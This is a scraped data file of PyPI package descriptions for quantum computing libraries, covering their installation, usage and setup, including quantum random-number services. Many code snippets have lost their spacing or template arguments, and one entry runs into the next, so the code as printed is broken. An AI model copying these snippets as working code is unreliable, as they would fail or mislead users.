(1), 51-83.Cohen, L. Time-Frequency Analysis, Prentice-Hall, NI 07458, 1995.Stockwell, R. G., Mansina, L, and R. P. Lowe. Localization of the Complex Spectrum: The S Transform. Signal Processing, IEEE Transactions, 1996, 44 no. 4, 998-1001.Mallat, S. A Wavelet Tour of Signal Processing: The Sparse Way, 3rd ed.; Academic Press: Cambridge, MA, USA, 2009 [1998 first ed].Installationpipinstallquantum-infernoMore details will be placed in theInstallation guide.ExamplesFull examples can be found in theexamples documentation.API DocumentationCheck theAPI Documentation.ResourcesFound an issue? Submit abug report.MIT License"} +{"package": "quantuminspire", "pacakge-description": "Quantum Inspire SDKThe Quantum Inspire platform allows to execute quantum algorithms using the cQASM language.The software development kit (SDK) for the Quantum Inspire platform consists of:An API for theQuantum Inspireplatform (the QuantumInspireAPI class);Backends for:theProjectQ SDK;theQiskit SDK.For more information on Quantum Inspire seehttps://www.quantum-inspire.com/. Detailed information\non cQASM can be found in the Quantum Inspireknowledge base.Examples of more complex algorithms that make use of Quantum Inspire SDK can be found inQuantum Inspire Examples.InstallationThe Quantum Inspire SDK can be installed from PyPI via pip:pip install quantuminspireIn addition, to use Quantum Inspire through Qiskit or ProjectQ, install either or both of\nthe qiskit and projectq packages:pip install qiskit\npip install projectqInstalling from sourceThe source for the SDK can also be found at Github. 
For the default installation execute:git clone https://github.com/QuTech-Delft/quantuminspire\ncd quantuminspire\npip install .This does not install ProjectQ or Qiskit, but will install the Quantum Inspire backends for\nthose projects.If you want to include a specific SDK as a dependency, install with\n(e.g. for the ProjectQ backend):pip install .[projectq]To install both ProjectQ as well as Qiskit as a dependency:pip install .[qiskit,projectq]Installing for generating documentationTo install the necessary packages to perform documentation activities for SDK do:pip install -e .[rtd]The documentation generation process is dependent on pandoc. When you want to generate the\ndocumentation and pandoc is not yet installed on your system navigate\ntoPandocand follow the instructions found there to install pandoc.\nTo build the 'readthedocs' documentation do:cd docs\nmake htmlThe documentation is then build in 'docs/_build/html' and can be viewedhere.RunningFor example usage see the python scripts and Jupyter notebooks in thedocs/examplesdirectory\nwhen installed from source or the share/doc/quantuminspire/examples/ directory in the\nlibrary root (Python\u2019s sys.prefix for system installations; site.USER_BASE for user\ninstallations) when installed from PyPI.For example, to run the ProjectQ example notebook after installing from source:cd docs/examples\njupyter notebook example_projectq.ipynbOr to perform Grover's with the ProjectQ backend from a Python script:cd docs/examples\npython example_projectq_grover.pyAnother way to browse and run the available notebooks is by clicking the 'launch binder' button above.It is also possible to use the API through the QuantumInspireAPI object\ndirectly. This is for advanced users that really know what they are\ndoing. The intention of the QuantumInspireAPI class is that it is used\nas a thin layer between existing SDK's such as ProjectQ and Qiskit,\nand is not primarily meant for general use. You may want to explore this\nif you intend to write a new backend for an existing SDK.A simple example to perform entanglement between two qubits by using the\nAPI wrapper directly:fromgetpassimportgetpassfromcoreapi.authimportBasicAuthenticationfromquantuminspire.apiimportQuantumInspireAPIprint('Enter mail address')email=input()print('Enter password')password=getpass()server_url=r'https://api.quantum-inspire.com'authentication=BasicAuthentication(email,password)qi=QuantumInspireAPI(server_url,authentication,'my-project-name')qasm='''version 1.0qubits 2H q[0]CNOT q[0], q[1]Measure q[0,1]'''backend_type=qi.get_backend_type_by_name('QX single-node simulator')result=qi.execute_qasm(qasm,backend_type=backend_type,number_of_shots=1024)ifresult.get('histogram',{}):print(result['histogram'])else:reason=result.get('raw_text','No reason in result structure.')print(f'Result structure does not contain proper histogram data.{reason}')Configure a project name for Quantum InspireAs a default, SDK stores the jobs in a Quantum Inspire project with the name \"qi-sdk-project-\" concatenated with a\nunique identifier for each run. 
Providing a project name yourself makes it easier to find the project in the Quantum\nInspire web-interface and makes it possible to gather related jobs to the same project.Qiskit users do something like:fromcoreapi.authimportBasicAuthenticationfromquantuminspire.qiskitimportQIauthentication=BasicAuthentication(\"email\",\"password\")QI.set_authentication(authentication,project_name='my-project-name')or set the project name separately after setting authenticationfromcoreapi.authimportBasicAuthenticationfromquantuminspire.qiskitimportQIauthentication=BasicAuthentication(\"email\",\"password\")QI.set_authentication(authentication)QI.set_project_name('my-project-name')ProjectQ users set the project name while initializing QuantumInspireAPI:fromcoreapi.authimportBasicAuthenticationfromquantuminspire.apiimportQuantumInspireAPIauthentication=BasicAuthentication(\"email\",\"password\")qi_api=QuantumInspireAPI(authentication=authentication,project_name='my-project-name')Configure your token credentials for Quantum InspireCreate a Quantum Inspire account if you do not already have one.Get an API token from the Quantum Inspire website.With your API token run:fromquantuminspire.credentialsimportsave_accountsave_account('YOUR_API_TOKEN')After calling save_account(), your credentials will be stored on disk.\nThose who do not want to save their credentials to disk should use instead:fromquantuminspire.credentialsimportenable_accountenable_account('YOUR_API_TOKEN')and the token will only be active for the session.After calling save_account() once or enable_account() within your session, token authentication is done automatically\nwhen creating the Quantum Inspire API object.For Qiskit users this means:fromquantuminspire.qiskitimportQIQI.set_authentication()ProjectQ users do something like:fromquantuminspire.apiimportQuantumInspireAPIqi=QuantumInspireAPI()To create a token authentication object yourself using the stored token you do:fromquantuminspire.credentialsimportget_authenticationauthentication=get_authentication()Thisauthenticationcan then be used to initialize the Quantum Inspire API object.TestingRun all unit tests and collect the code coverage using:coverage run --source=\"./src/quantuminspire\" -m unittest discover -s src/tests -t src -v\ncoverage report -mKnown issuesKnown issues and common questions regarding the Quantum Inspire platform\ncan be found in theFAQ.Bug reportsPlease submit bug-reportson the github issue tracker."} +{"package": "quantum-ios", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-isl", "pacakge-description": "Incremental Structure Learning (ISL)An open-source implementation of ISL [1], a circuit recompilation algorithm that finds an approximate representation of\nany circuit acting on the |0>|0>...|0> state. Created for the IBM Quantum Awards: Open Sciece Prize 2021. More details of ISL and its use in the Quantum Awards can be found by downloading the submissionhere.[1] B Jaderberg, A Agarwal, K Leonhardt, M Kiffner, D Jaksch, 2020 Quantum Sci. Technol. 
5 034015Installing ISLThe best way of installing ISL is throughpip:pip install quantum-islUsing ISLMinimal exampleA circuit can be recompiled and the result accessed with only 3 lines if using the\ndefault settings.fromisl.recompilersimportISLRecompilerfromqiskitimportQuantumCircuit# Setup the circuitqc=QuantumCircuit(3)qc.rx(1.23,0)qc.cx(0,1)qc.ry(2.5,1)qc.rx(-1.6,2)qc.ccx(2,1,0)# Recompilerecompiler=ISLRecompiler(qc)result=recompiler.recompile()recompiled_circuit=result['circuit']# See the recompiled outputprint(recompiled_circuit)Specifying additional configurationThe default settings can be changed by specifying arguments when\nbuildingISLRecompiler(). Many of the configuration options are bundled into theISLConfigclass.fromisl.recompilersimportISLRecompiler,ISLConfigfromqiskit.circuit.randomimportrandom_circuitqc=random_circuit(5,5,seed=2)# Recompileconfig=ISLConfig(sufficient_cost=1e-3,max_2q_gates=25)recompiler=ISLRecompiler(qc,entanglement_measure='EM_TOMOGRAPHY_CONCURRENCE',isl_config=config)result=recompiler.recompile()recompiled_circuit=result['circuit']# See the original circuitprint(qc)# See the recompiled solutionprint(recompiled_circuit)Here we have specified a number of thingssufficient_cost=1e-3: The state produced by the recompiled solution will have an overlap of at least 99.9% with respect to the state produced by the original circuit.max_2q_gates=25: If our solution contains more than 25 CNOT gates, return early. Setting this to the number of 2-qubit gates in the original circuit provides a useful upper limit.entanglement_measure: This argument on the recompiler itself specifies the type of entanglement measure used when deciding which qubits to add the next layer to.More configuration options can be explored in the documentation ofISLConfigandISLRecompiler.Comparing quantum resourcesTaking the above example, lets compare the number of gates and circuit depth before and after recompilation.fromqiskitimporttranspile# Transpile the original circuits to the common basis setqc_in_basis_gates=transpile(qc,basis_gates=['u1','u2','u3','cx'],optimization_level=3)print(qc_in_basis_gates.count_ops())print(qc_in_basis_gates.depth())# Compare with recompiled circuitprint(recompiled_circuit.count_ops())print(recompiled_circuit.depth())In the above example, the original circuit contains 25 CNOT gates and\n32 single-qubit gates with a depth of 33. By comparison, the recompiled solution\nprepares the same state to 99.9% overlap with on average 6 CNOT gates and\n8 two-qubit gates with a depth of 9 (average tested over 10 runs).TroubleshootingNote: ISL depends onqiskit-ignis, which was deprecated in Qiskit 0.37.0. Until migration to Qiskit Experiments is completed, you may see the following error:ModuleNotFoundError: No module named 'qiskit.ignis'To fix this, simply downagrade your version of Qiskit to < 0.37.0.Citing usageWe respectfully ask any publication, project or whitepaper using ISL to cite the original literature:B Jaderberg, A Agarwal, K Leonhardt, M Kiffner, D Jaksch, 2020 Quantum Sci. Technol. 
5 034015.https://doi.org/10.1088/2058-9565/ab972b"} +{"package": "quantum-jet", "pacakge-description": "Jetis a cross-platform C++ and Python\nlibrary for simulating quantum circuits using tensor network contractions.FeaturesRuns on a variety of systems, from single-board machines to massively parallel\nsupercomputers.Accelerates tensor contractions using a novel task-based parallelism approach.Models quantum systems with an arbitrary number of basis states.To get started with Jet, read one of ourtutorial walkthroughsor\nbrowse the fullAPI documentation.InstallationC++The Jet C++ library requiresTaskflow,\na BLAS library with a CBLAS interface, and a C++ compiler with C++17 support.\nTo use Jet, add#include to the top of your header file and link\nyour program with the CBLAS library.For example, assuming that the Taskflow headers can be found in yourg++include path and OpenBLAS is installed on your system, you can compile thehellojet.cppprogram below#include#include#include#includeintmain(){usingTensor=Jet::Tensor>;Tensorlhs({\"i\",\"j\",\"k\"},{2,2,2});Tensorrhs({\"j\",\"k\",\"l\"},{2,2,2});lhs.FillRandom();rhs.FillRandom();Tensorres=Tensor::ContractTensors(lhs,rhs);for(constauto&datum:res.GetData()){std::cout<>>importquantumnetworksasqnBuilding from sourceTo buildquantumnetworksfrom source, pip install using:git clone git@github.com:Phionx/quantumnetworks.git\ncd quantumnetworks\npip install --upgrade .If you also want to download the dependencies needed to run optional tutorials, please usepip install --upgrade .[dev]orpip install --upgrade '.[dev]'(forzshusers).Installation for DevsIf you intend to contribute to this project, please installquantumnetworksin develop mode as follows:gitclonegit@github.com:Phionx/quantumnetworks.gitcdquantumnetworks\npipinstall-e.[dev]Please usepip install -e '.[dev]'if you are azshuser.MotivationWe presentquantumnetworksas a numerical simulation tool with which to explore the time-dynamics of a driven, lossness, and nonlinear multi-mode quantum network using the Heisenberg-Langevin Equations. 
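To make the kind of time-dynamics meant here concrete, the short sketch below integrates the mean-field Heisenberg-Langevin equation for a single driven, damped mode with plain NumPy; the parameter values are illustrative assumptions and the code deliberately does not use the quantumnetworks API itself.
import numpy as np

# Illustrative parameters (assumed values, not taken from the package or its docs)
kappa = 0.1    # mode decay rate
delta = 0.5    # drive-mode detuning
drive = 0.2    # coherent drive amplitude
dt, steps = 0.01, 5000

a = 0.0 + 0.0j                       # mean-field mode amplitude <a>
for _ in range(steps):
    # d<a>/dt = -(i*delta + kappa/2)*<a> - i*drive   (noise term dropped at mean-field level)
    a += dt * (-(1j * delta + kappa / 2) * a - 1j * drive)

print(abs(a) ** 2)                   # steady-state photon number of the driven mode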
The applications of this tooling span quantum transduction, bosonic quantum error correction systems, quantum communication, and more.CodebaseThe codebase is split acrossquantumnetworks/systemsandquantumnetworks/analysis, which respectively provide solvers and analysis tools for several quantum network systems of interest.Future DirectionsCheckoutissuesto see what we are working on these days!AcknowledgementsCore Devs:Shantanu Jha,Shoumik Chowdhury,Lamia AteshianThanks toProfessor Luca Danieland our TA, Taqiyyah Safi, for invaluable feedback during the development of this package in the Fall 2021 iteration ofIntroduction to Numerical Simulation(6.336) at MIT."} +{"package": "quantum-pecos", "pacakge-description": "PECOS (Performance Estimator of Codes On Surfaces) is a Python framework for studying, developing, and evaluating\nquantum error-correction protocols.Author: Ciar\u00c3\u00a1n Ryan-AndersonLanguage: Python 3.5.2+ (with optional C and C++ extensions)ContactFor questions or suggestions, please feel free to contact the author:Ciar\u00c3\u00a1n Ryan-Anderson,ciaran.ryan-anderson@quantinuum.comGetting StartedTo get started, check out the documentation in the \"docs\" folder or find it online at:https://quantum-pecos.readthedocs.ioLatest DevelopmentSee the following branch for the latest version of PECOS under development:https://github.com/PECOS-packages/PECOS/tree/developmentBEAWARE: There are some changes planned in 0.2.dev that may break some backwards compatibility with 0.1. Although, we try to minimize breaks to backwards compatibility.RequirementsPython 3.5.2+NumPy 1.15+SciPy 1.1+Matplotlib 2.2+NetworkX 2.1+Optional DependenciesCython (to compile optional C/C++ extensions)pytest 3.0+ (to run tests)Sphinx 2.7.6+ (to compile documentation)LicensePECOS is licensed under theApache 2.0 licenseInstallationTo install using pip run the command:pip install quantum-pecosTo install from GitHub go to:https://github.com/PECOS-packages/PECOSThen, download/unzip or clone the version of PECOS you would like to use. Next, navigate to the root of the package\n(where setup.py is located) and run:pip install .To install and continue to develop the version of PECOS located in the install folder, run the\nfollowing instead:pip install -e .UninstallTo uninstall run:pip uninstall quantum-pecos"} +{"package": "quantumpy", "pacakge-description": "Quantumpy======An ultra simple wrapper for the Socialmetrix Quantum API, with basic functionalityUsage-----::from quantumpy import QuantumAPI# Initialize connection with the api, providing account_id and your JWT tokenc = QuantumAPI(account_id, jwt_token)# Get all projects associated with accountprojects = c.get_projects()Installation------------::$ pip install quantumpy"} +{"package": "quantum-QBD", "pacakge-description": "Quantum side."} +{"package": "quantum-qt", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-qubit-mapping", "pacakge-description": "Qubit Mapping for NISQ-Era Quantum DevicesIntroductionThe goal of this project was to implement the paperTackling the Qubit Mapping Problem for NISQ-Era Quantum DevicesbyGushu Li, Yufei Ding, and Yuan Xie.PurposeDue to limited connections between physical qubits, most two-qubit gates cannot be directly implemented on Noisy Intermediate-Scale Quantum (NISQ) devices. A dynamic remapping of logical to physical qubits is needed to enable execution of two qubit gates in a quantum algorithm on a NISQ device. 
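As a rough, package-independent illustration of that constraint (the graph, mapping and helper below are hypothetical names invented for this sketch), a two-qubit gate is only directly executable when its logical qubits are mapped onto physically coupled qubits:
import networkx as nx

# Toy 4-qubit line device: only neighbouring physical qubits are coupled
coupling_graph = nx.Graph([(0, 1), (1, 2), (2, 3)])

# Hypothetical current mapping of logical qubits to physical qubits
mapping = {0: 0, 1: 3}

def directly_executable(logical_pair, mapping, coupling_graph):
    """True if the gate's logical qubits sit on coupled physical qubits."""
    p, q = (mapping[l] for l in logical_pair)
    return coupling_graph.has_edge(p, q)

print(directly_executable((0, 1), mapping, coupling_graph))  # False: SWAPs are needed first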
This project implements aSWAP-based BidiREctional heuristic search algorithm (SABRE), proposed in the given paper that is applicable to NISQ devices with arbitrary qubit connectionsProblem StatementGiven an input quantum circuit and the coupling graph of a quantum device, find aninitial mappingand the intermediate qubitmapping transition(by inserting SWAPs) to satisfy all two-qubit constraints and try to minimize the number of additional gates and circuit depth in the final hardware-compliant circuit.ReferencesTackling the Qubit Mapping Problem for NISQ-Era Quantum DevicesbyGushu Li, Yufei Ding, and Yuan Xie.Click here for pdfPyquil docsUsageAn example of how to use this package is illustrated inexample.py.Construct a pyquil program:from pyquil import Program\nfrom pyquil.gates import CNOT, Gate, H, SWAP\noriginal_circuit = Program()\noriginal_circuit.inst(CNOT(0, 1))\noriginal_circuit.inst(CNOT(2, 3))\noriginal_circuit.inst(CNOT(1, 3))\noriginal_circuit.inst(CNOT(1, 2))\noriginal_circuit.inst(CNOT(2, 3))\noriginal_circuit.inst(CNOT(0, 3))Define a coupling graph (the coupling graph can also be a predefined one based on the underlying chip architecture):import networkx as nx\ncoupling_graph = nx.Graph()\ncoupling_graph.add_edges_from([(0, 1), (0, 2), (1, 3), (2, 3)])Apply preprocessing on the circuit and the coupling graph to generate a random initial mapping and a distance matrix:from sabre_tools.circuit_preprocess import preprocess_input_circuit, get_initial_mapping, get_distance_matrix\ninitial_mapping = get_initial_mapping(circuit=original_circuit, coupling_graph=coupling_graph)\ndistance_matrix = get_distance_matrix(coupling_graph=coupling_graph)Execute the SABRE algorithm on the circuit in forward-backward-forward passes where final mapping output of each pass is provided as the initial mapping of the reverse circuit in the next passfrom sabre_tools.sabre import SABRE\nfor iteration in range(3):\nfront_layer_gates, circuit_dag = preprocess_input_circuit(circuit=temp_circuit)\nfinal_program, final_mapping = sabre_proc.execute_sabre_algorithm(front_layer_gates = front_layer_gates, qubit_mapping = temp_mapping, circuit_dag = circuit_dag)\n\nreversed_ins = reversed(temp_circuit.instructions)\ntemp_circuit = Program()\nfor ins in reversed_ins:\n temp_circuit.inst(ins)\ntemp_mapping = final_mapping.copy()To check if SABRE algorithm was able to insert SWAPs in the circuit so that all 2-qubit gates were executed successfully, call therewiring_correctness()function:forbidden_gates = sabre_proc.rewiring_correctness(final_program, final_mapping)\nif forbidden_gates:\n print(\"\", forbidden_gates)\nelse:\n print(\"All gates have been executed\")This function scans the logical to physical qubit mapping and the SWAP inserted circuit to determine if there are gates are not executable and returns the non-executable gate if true, otherwise returns an empty dictionary. This function can also be used to check if the original circuit requires the use of SABRE in the first placeCount the number of 2 qubit gates in the original or final circuit to determine the circuit depth and number of gates:two_qubit_gate_count = sabre_proc.cnot_count(program)Future ScopeThis project has been developed using Rigetti's quantum programming framework Pyquil. 
A future scope of this project is to make it platform independent so that SABRE can be applied to a quantum program written in any framework.\nAnother possible scope of research is to implement other algorithms in this field and perform a comparison based on number of gates reduction, scalability, runtime speedup, algorithm performance on large circuits etc.QC Mentorship ProgramThis project has been initiated and completed as part of theQC Mentorship ProgramunderQuantum Open Source Foundation (QOSF)in collaboration withUnitary Fund.This work has been completed with constant guidance and motivation by my mentor Petar Korponai\u00c4\u2021\n(LinkedIn)."} +{"package": "quantum-queen", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-query-optimizer", "pacakge-description": "QuantumQueryOptimizerA toolkit to find the optimal quantum query complexity and query optimal quantum algorithm of arbitrary Boolean functions.We present this toolkit in our paper titled\n\"Robust and Space-Efficient Dual Adversary Quantum Query Algorithms\".\nThe code, data, and figures for the experiments in the paper can\nbe found in thepaper/folder.Consider a function f that maps from D to E where D is a subset of bitstrings\nof length n and E is the corresponding set of single bit outputs.\nIn the query model, an algorithm looks at the bits of the input string x in D\nas few times as possible before correctly determing f(x).\nGiven f, our program finds the optimal query complexity of a quantum algorithm\nthat evaluates f and a span program (i.e. quantum algorithm) that meets\nthis query complexity by solving a semidefinite program (SDP).There are two ways to run our program.\nFirst, explicitly specify the sets D and E.\nSecond, create one function that generates the set D for arbitrary bitstring length n\nand another function that generates the set E from D according to f.\n(Note: We provide example functions inboolean_functions.py.)InstallationInstall via pip withpip install quantum-query-optimizer.Example 1 - Explicit ConstructionWe consider the Boolean functionORon input bitstrings of length 2.\nThe output is'1'if any bit is 1 and'0'otherwise.\nIn this example, we explicitly define bothDandE.\nThen we call our functionqqo.runSDPafter loading the\nour packagequantum_query_optimizerasqqo.importquantum_query_optimizerasqqoD=['00','01','10','11']E=['0','1','1','1']qqo.runSDP(D=D,E=E)The corresponding output should look similar to:n: 2\nD: ['00', '01', '10', '11']\nE: ['0', '1', '1', '1']\nOptimal Query Complexity: 1.414\nNumber of Iterations: 73\nRun Time: 0.067 secondsExample 2 - Function ConstructionWe again considerORon bitstrings of length 2.\nIn this example, though, we define functions to generate\nall bitstrings of length n and evaluate the functionORon D.\nThen we pass our functions intoqqo.runSDPForNand specify\nfor which sizes of bitstringnwe want to solve the SDP.importquantum_query_optimizerasqqoqqo.runSDPForN(getD=qqo.getDAll,getE=qqo.getEOR,n_end=2,n_start=2))The corresponding output should look similar to:n: 2\nD: ['00', '01', '10', '11']\nE: ['0', '1', '1', '1']\nOptimal Query Complexity: 1.414\nNumber of Iterations: 73\nRun Time: 0.058 seconds(You can find more examples indemo.ipynb.)Semidefinite Program FormulationWe use Ben Reichardt's formulation of the SDP for\noptimal quantum query complexity (described inTheorem 6.2)\nand query optimal span program (Lemma 6.5) inSpan programs and quantum query complexity:\nThe general adversary bound is nearly tight for every 
boolean function.Alternating Direction MethodTo solve the SDP,\nwe use Zaiwen Wen, Donald Goldfarb, and Wotao Yin'sAlgorithm 1described inAlternating direction augmented Lagrangian methods for semidefinite programming."} +{"package": "quantumrand", "pacakge-description": "QuantumRandmaintained fork oflmacken/quantumrandomThis project provides tools for interacting with The ANU Quantum Random Number Generator (qrng.anu.edu.au). It communicates with their JSON API and provides a Python API,aqrandcommand-line tool, and a Linux/dev/qrandcharacter device.(This has to be fixed).QuantumRand was made to work with Python 3. Python 2 support has been dropped as it has now reached End of Life.As of 2.0, QuantumRand has had to adapt to ANU's SSL certificate expiring. QuantumRand is still able to connect via SSL by default, but please be aware that QuantumRand cannot securely validate ANU's SSL authenticity until they update their certificate.Installationpip install quantumrandPython APILow Level API ExamplesThe QuantumRand Python module contains a low-levelget_datafunction, which is modelled after the ANU Quantum Random Number\nGenerator's JSON API. It returns variable-length lists of eitheruint16orhex16data.Validdata_typevalues areuint16andhex16.Thearray_lengthandblock_sizecannot be larger than1024.If for some reason the API call is not successful, or the incorrect amount of data is returned from the server, this function will raise an exception.quantumrand.get_data()[26646]quantumrand.get_data(data_type='uint16', array_length=5)[42796, 32457, 9242, 11316, 21078]quantumrand.get_data(data_type='hex16', array_length=5, block_size=2)['f1d5', '0eb3', '1119', '7cfd', '64ce']High Level API ExamplesBased on the aboveget_datafunction, quantumrand also provides a bunch of higher-level helper functions that make it easy to perform a variety of tasks.Generate a random integerquantumrand.randfloat(0, 20)18.936751354238194quantumrand.randint(0, 20)5Generate random HEX as a stringquantumrand.hex()[:10]'8272613343'Generate random binary formatted stringquantumrand.binary()[:3]'\\xa5\\x0d\\x1e'The previousbinary()function returns 10000 byteslen(quantumrand.binary())10000Generate uint16 values as a Numpy arrayquantumrand.uint16()numpy.array([24094, 13944, 22109, 22908, 34878, 33797, 47221, 21485, 37930, ...], dtype=numpy.uint16)Randomly select an item from a listquantumrand.list_picker([\"Mary\", \"Bill\", \"Chad\", \"Nicole\"])\"Nicole\"Dice rollingThe two main methods aredice_roll()andquick_dice(). Both methods can take 3 optional arguments:nis the number of dice to roll (default is1)dis the number of sides on each die (default is6)minis the lowest number on the die (default is1)dice_roll()returns a tuple where the first value is a list of individual dice rolls, and the second value is the total of the dice rolls.quick_dice()returns an integer with the total of the dice rolls. 
This is best for single die rolls and dice rolls you don't need to know the individual rolls of.Roll a single d6 (a standard 6 sided die) and show resultsquantumrand.dice_roll()([3], 3)Roll a single d20 and show resultsquantumrand.dice_roll(d=20)([19], 19)Roll two d9 (0-9) and show resultsquantumrand.dice_roll(d=9, n=2, min=0)([0,3], 3)Roll three d8 and show resultsquantumrand.dice_roll(d=8, n=3)([4,8,3], 15)Roll three d9 (0-9) and show only the total.quantumrand.quick_dice(d=9, n=3, min=0)24You can roll a die with any number of sidesquantumrand.quick_dice(d=67)1Using the Command Line ToolCurrently still being fixed!Getting a random integer within a range:qrand --int --min 5 --max 157Getting random binary values:qrand --binary\ufffd\ufffd\ufffdI\ufffd%\ufffd\ufffde(\ufffd1\ufffd\ufffdc\ufffd\ufffdEe\ufffd4\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdj\ufffd\u053f\ufffd\ufffd=\ufffd^H\ufffdc\ufffdu\noq\ufffd\ufffdG\ufffd\ufffdZ\ufffd^\ufffd\ufffd\ufffdfK\ufffd0_\ufffd\ufffdh\ufffd\ufffds\ufffdb\ufffd\ufffdAE=\ufffdrR~\ufffd\ufffd\ufffd(\ufffd^Q\ufffd)4\ufffd\ufffd{c\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdX{f\ufffd\ufffda\ufffdBk\ufffdN%#W\n+a\ufffda\u0319\ufffdIB\ufffd,S\ufffd!\ua014d\ufffd2H~\ufffdX\ufffdZ\ufffd\ufffd\ufffd\ufffdR\ufffd\ufffd.fGetting random hex values:qrand --hex1dc59fde43b5045120453186d45653dd455bd8e6fc7d8c591f0018fa9261ab2835eb210e8\ne267cf35a54c02ce2a93b3ec448c4c7aa84fdedb61c7b0d87c9e7acf8e9fdadc8d68bcaa5aCreating /dev/qrandThis will have to be updated, as it is not working for any supported version of Python currently."} +{"package": "quantumrandom", "pacakge-description": "This project provides tools for interacting with The ANU Quantum Random\nNumber Generator (qrng.anu.edu.au). It\ncommunicates with their JSON API and provides aqrandomcommand-line\ntool, a Python API, and a Linux/dev/qrandomcharacter device.quantumrandom works on Python 2 and 3.NoteAs of version 1.7, quantumrandom now uses SSL/TLS by default.Installingpip install quantumrandomCommand-line tool$ qrandom --int --min 5 --max 15\n7\n$ qrandom --binary\n\ufffd\ufffd\ufffdI\ufffd%\ufffd\ufffde(\ufffd1\ufffd\ufffdc\ufffd\ufffdEe\ufffd4\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdj\ufffd\u053f\ufffd\ufffd=\ufffd^H\ufffdc\ufffdu\noq\ufffd\ufffdG\ufffd\ufffdZ\ufffd^\ufffd\ufffd\ufffdfK\ufffd0_\ufffd\ufffdh\ufffd\ufffds\ufffdb\ufffd\ufffdAE=\ufffdrR~\ufffd\ufffd\ufffd(\ufffd^Q\ufffd)4\ufffd\ufffd{c\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdX{f\ufffd\ufffda\ufffdBk\ufffdN%#W\n+a\ufffda\u0319\ufffdIB\ufffd,S\ufffd!\ua014d\ufffd2H~\ufffdX\ufffdZ\ufffd\ufffd\ufffd\ufffdR\ufffd\ufffd.f\n...\n$ qrandom --hex\n1dc59fde43b5045120453186d45653dd455bd8e6fc7d8c591f0018fa9261ab2835eb210e8\ne267cf35a54c02ce2a93b3ec448c4c7aa84fdedb61c7b0d87c9e7acf8e9fdadc8d68bcaa5a\n...\n$ qrandom --binary | dd of=data\n^C1752+0 records in\n1752+0 records out\n897024 bytes (897 kB) copied, 77.7588 s, 11.5 kB/sCreating /dev/qrandomquantumrandom comes equipped with a multi-threaded character device in\nuserspace. When read from, this device fires up a bunch of threads to\nfetch data. Not only can you utilize this as a rng, but you can also feed\nthis data back into your system\u2019s entropy pool.In order to build it\u2019s dependencies, you\u2019ll need the following packages\ninstalled: svn gcc-c++ fuse-devel gccxml libattr-devel. 
On Fedora 17 and\nnewer, you\u2019ll also need the kernel-modules-extra package installed for the\ncuse module.NoteThe /dev/qrandom character device currently only supports Python2pip install ctypeslib hg+https://cusepy.googlecode.com/hg\nsudo modprobe cuse\nsudo chmod 666 /dev/cuse\nqrandom-dev\nsudo chmod 666 /dev/qrandomBy default it will use 3 threads, which can be changed by passing \u2018-t #\u2019 into the qrandom-dev.Testing the randomness forFIPS 140-2compliance$ cat /dev/qrandom | rngtest --blockcount=1000\nrngtest: bits received from input: 20000032\nrngtest: FIPS 140-2 successes: 1000\nrngtest: FIPS 140-2 failures: 0\nrngtest: FIPS 140-2(2001-10-10) Monobit: 0\nrngtest: FIPS 140-2(2001-10-10) Poker: 0\nrngtest: FIPS 140-2(2001-10-10) Runs: 0\nrngtest: FIPS 140-2(2001-10-10) Long run: 0\nrngtest: FIPS 140-2(2001-10-10) Continuous run: 0\nrngtest: input channel speed: (min=17.696; avg=386.711; max=4882812.500)Kibits/s\nrngtest: FIPS tests speed: (min=10.949; avg=94.538; max=161.640)Mibits/s\nrngtest: Program run time: 50708319 microsecondsAdding entropy to the Linux random number generatorsudo rngd --rng-device=/dev/qrandom --random-device=/dev/random --timeout=5 --foregroundMonitoring your available entropy levelswatch -n 1 cat /proc/sys/kernel/random/entropy_availPython APIThe quantumrandom Python module contains a low-levelget_datafunction, which is modelled after the ANU Quantum Random Number\nGenerator\u2019s JSON API. It returns variable-length lists of eitheruint16orhex16data.>>> quantumrandom.get_data()\n[26646]\n>>> quantumrandom.get_data(data_type='uint16', array_length=5)\n[42796, 32457, 9242, 11316, 21078]\n>>> quantumrandom.get_data(data_type='hex16', array_length=5, block_size=2)\n['f1d5', '0eb3', '1119', '7cfd', '64ce']Validdata_typevalues areuint16andhex16, and thearray_lengthandblock_sizecannot be larger than1024. If for some\nreason the API call is not successful, or the incorrect amount of data is\nreturned from the server, this function will raise an exception.Based on thisget_datafunction, quantumrandom also provides a bunch\nof higher-level helper functions that make easy to perform a variety of\ntasks.>>> quantumrandom.randint(0, 20)\n5\n>>> quantumrandom.hex()[:10]\n'8272613343'\n>>> quantumrandom.binary()[0]\n'\\xa5'\n>>> len(quantumrandom.binary())\n10000\n>>> quantumrandom.uint16()\nnumpy.array([24094, 13944, 22109, 22908, 34878, 33797, 47221, 21485, 37930, ...], dtype=numpy.uint16)\n>>> quantumrandom.uint16().data[:10]\n'\\x87\\x7fY.\\xcc\\xab\\xea\\r\\x1c`'"} +{"package": "quantum-random", "pacakge-description": "Quantum random numbers in PythonUse thePython random modulewith real quantum random numbers fromANU. The default pseudo-random generator is replaced by calls to\nthe ANU API.UsageImportqrandomand use it like the standardrandommodule. For example:>>>importqrandom>>>qrandom.random()0.15357449726583722>>>qrandom.sample(range(10),2)[6,4]>>>qrandom.gauss(0.0,1.0)-0.8370871276247828Alternatively, you can use the classqrandom.QuantumRandom. It has the same\ninterface asrandom.Random.There is also aNumPyinterface, although it is not fully tested:>>>fromqrandom.numpyimportquantum_rng>>>qrng=quantum_rng()>>>qrng.random((3,3))# use like numpy.random.default_rng()array([[0.37220278,0.24337193,0.67534826],[0.209068,0.25108681,0.49201691],[0.35894084,0.72219929,0.55388594]])NumPy is supported usingRandomGen.InstallationThe minimum supported Python version is 3.9. 
